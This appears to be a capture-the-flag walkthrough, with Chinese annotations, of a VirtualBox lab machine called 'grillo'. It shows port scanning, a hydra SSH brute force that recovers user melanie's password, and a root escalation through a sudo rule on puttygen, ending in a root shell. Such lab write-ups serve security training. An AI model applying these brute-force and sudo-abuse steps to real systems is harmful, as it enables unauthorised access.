┌──(root㉿Eecho)-[/tmp/bbbb] └─# rustscan -a 192.168.43.149 -- -A .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- You miss 100% of the ports you don't scan. - RustScan
[~] The config file is expected to be at "/root/.rustscan.toml" [~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'. Open 192.168.43.149:22 Open 192.168.43.149:80 [~] Starting Script(s) [>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.43.149 Depending on the complexity of the script, results may take some time to appear. [~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-21 18:12 +0800 NSE: Loaded 158 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 18:12 Completed NSE at 18:12, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 18:12 Completed NSE at 18:12, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 18:12 Completed NSE at 18:12, 0.00s elapsed Initiating ARP Ping Scan at 18:12 Scanning 192.168.43.149 [1 port] Completed ARP Ping Scan at 18:12, 0.04s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 18:12 Completed Parallel DNS resolution of 1 host. at 18:12, 0.50s elapsed DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 18:12 Scanning 192.168.43.149 [2 ports] Discovered open port 80/tcp on 192.168.43.149 Discovered open port 22/tcp on 192.168.43.149 Completed SYN Stealth Scan at 18:12, 0.02s elapsed (2 total ports) Initiating Service scan at 18:12 Scanning 2 services on 192.168.43.149 Completed Service scan at 18:12, 6.03s elapsed (2 services on 1 host) Initiating OS detection (try #1) against 192.168.43.149 NSE: Script scanning 192.168.43.149. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 18:12 Completed NSE at 18:12, 0.22s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 18:12 Completed NSE at 18:12, 0.01s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 18:12 Completed NSE at 18:12, 0.00s elapsed Nmap scan report for 192.168.43.149 Host is up, received arp-response (0.00063s latency). Scanned at 2026-05-21 18:12:04 CST for 8s
PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0) | ssh-hostkey: | 256 9c:e0:78:67:d7:63:23:da:f5:e3:8a:77:00:60:6e:76 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGjZjT9uVInycGr+L2uWFk2OHfIU6ziqLqjc31ns1WmQ6Hr6uDnP8LT23hig2aIXwb3uRT1F7Q1q5YSr4zozu64= | 256 4b:30:12:97:4b:5c:47:11:3c:aa:0b:68:0e:b2:01:1b (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINl5E2qTz+BE4drC1MXdiCyaKavO+3ur4RldEaIe41fC 80/tcp open http syn-ack ttl 64 Apache httpd 2.4.57 ((Debian)) |_http-title: Apache2 Debian Default Page: It works |_http-server-header: Apache/2.4.57 (Debian) | http-methods: |_ Supported Methods: HEAD GET POST OPTIONS MAC Address: 08:00:27:44:BA:79 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) TCP/IP fingerprint: OS:SCAN(V=7.99%E=4%D=5/21%OT=22%CT=%CU=32038%PV=Y%DS=1%DC=D%G=N%M=080027%TM OS:=6A0EDA7C%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10A%TI=Z%CI=Z%II=I% OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5 OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6= OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O% OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0 OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N OS:%T=40%CD=S)
Uptime guess: 29.129 days (since Wed Apr 22 15:06:22 2026) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=259 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE HOP RTT ADDRESS 1 0.63 ms 192.168.43.149
NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 18:12 Completed NSE at 18:12, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 18:12 Completed NSE at 18:12, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 18:12 Completed NSE at 18:12, 0.00s elapsed Read data files from: /usr/share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.35 seconds Raw packets sent: 25 (1.894KB) | Rcvd: 17 (1.366KB)
22 SSH
80 HTTP
入口
在主页的下面给出了提示用户名
// Cambia la contraseña de ssh por favor melanie
请更改 ssh 的密码,melanie
爆破melanie密码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
┌──(root㉿Eecho)-[/tmp/bbbb] └─# hydra -l melanie -P /usr/share/wordlists/rockyou.txt ssh://192.168.43.149 Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-05-21 18:16:44 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking ssh://192.168.43.149:22/ [STATUS] 180.00 tries/min, 180 tries in 00:01h, 14344226 to do in 1328:11h, 9 active [STATUS] 150.67 tries/min, 452 tries in 00:03h, 14343954 to do in 1586:44h, 9 active [22][ssh] host: 192.168.43.149 login: melanie password: trustno1 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 7 final worker threads did not complete until end. [ERROR] 7 targets did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-05-21 18:23:11
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Fri Apr 12 20:38:54 2024 from 192.168.0.100 melanie@grillo:~$ id uid=1000(melanie) gid=1000(concebolla) grupos=1000(concebolla),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev) melanie@grillo:~$
提权
melanie -> root
1 2 3 4 5 6
melanie@grillo:~$ sudo -l Matching Defaults entries for melanie on grillo: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User melanie may run the following commands on grillo: (root) NOPASSWD: /usr/bin/puttygen
melanie@grillo:~$ sudo /usr/bin/puttygen -h PuTTYgen: key generator and converter for the PuTTY tools Release 0.78 Usage: puttygen ( keyfile | -t type [ -b bits ] ) [ -C comment ] [ -P ] [ -q ] [ -o output-keyfile ] [ -O type | -l | -L | -p ] -t specify key type when generating: eddsa, ecdsa, rsa, dsa, rsa1 use with -b ed25519, ed448 special cases of eddsa -b specify number of bits when generating key -C change or specify key comment -P change key passphrase -q quiet: do not display progress bar -O specify output type: private output PuTTY private key format private-openssh export OpenSSH private key private-openssh-new export OpenSSH private key (force new format) private-sshcom export ssh.com private key public RFC 4716 / ssh.com public key public-openssh OpenSSH public key fingerprint output the key fingerprint cert-info print certificate information text output the key components as 'name=0x####' -o specify output file -l equivalent to `-O fingerprint' -L equivalent to `-O public-openssh' -p equivalent to `-O public' --cert-info equivalent to `-O cert-info' --dump equivalent to `-O text' -E fptype specify fingerprint output type: sha256, md5, sha256-cert, md5-cert --certificate file incorporate a certificate into the key --remove-certificate remove any certificate from the key --reencrypt load a key and save it with fresh encryption --old-passphrase file specify file containing old key passphrase --new-passphrase file specify file containing new key passphrase --random-device device specify device to read entropy from (e.g. /dev/urandom) --primes <type> select prime-generation method: probable conventional probabilistic prime finding proven numbers that have been proven to be prime proven-even also try harder for an even distribution --strong-rsa use "strong" primes as RSA key factors --ppk-param <key>=<value>[,<key>=<value>,...] specify parameters when writing PuTTY private key file format: version PPK format version (min 2, max 3, default 3) kdf key derivation function (argon2id, argon2i, argon2d) memory Kbyte of memory to use in passphrase hash (default 8192) time approx milliseconds to hash for (default 100) passes number of hash passes to run (alternative to 'time') parallelism number of parallelisable threads in the hash function (default 1)
melanie@grillo:~$ ssh -i /tmp/id_root root@localhost The authenticity of host 'localhost (::1)' can't be established. ED25519 key fingerprint is SHA256:AQriN/tRYOEaFyAyEecHnEyZfJTHLRILd1G2j74ViR8. This host key is known by the following other names/addresses: ~/.ssh/known_hosts:1: [hashed name] Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'localhost' (ED25519) to the list of known hosts. Linux grillo 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Thu May 21 12:22:15 2026 from 127.0.0.1 root@grillo:~# id uid=0(root) gid=0(root) grupos=0(root) root@grillo:~#